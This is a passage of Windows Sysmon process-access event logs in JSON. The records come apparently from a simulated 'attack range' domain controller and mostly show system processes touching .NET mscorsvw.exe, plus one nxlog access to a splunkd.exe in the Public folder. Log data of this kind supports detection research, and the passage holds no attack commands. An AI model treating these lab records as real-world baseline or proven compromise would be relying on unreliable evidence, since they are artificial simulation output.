0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.293","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00104EAD0B00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.293\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00104EAD0B00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.293","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00104EAD0B00}","TargetProcessId":"1528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.418\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010D7B00B00}\r\nTargetProcessId: 4816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.418","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010D7B00B00}","TargetProcessId":"4816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.418\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010D7B00B00}\r\nTargetProcessId: 4816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.418","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010D7B00B00}","TargetProcessId":"4816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.418\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010D7B00B00}\r\nTargetProcessId: 4816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.418","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010D7B00B00}","TargetProcessId":"4816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.465\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.465","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.465\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.465","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.465\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.465","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files 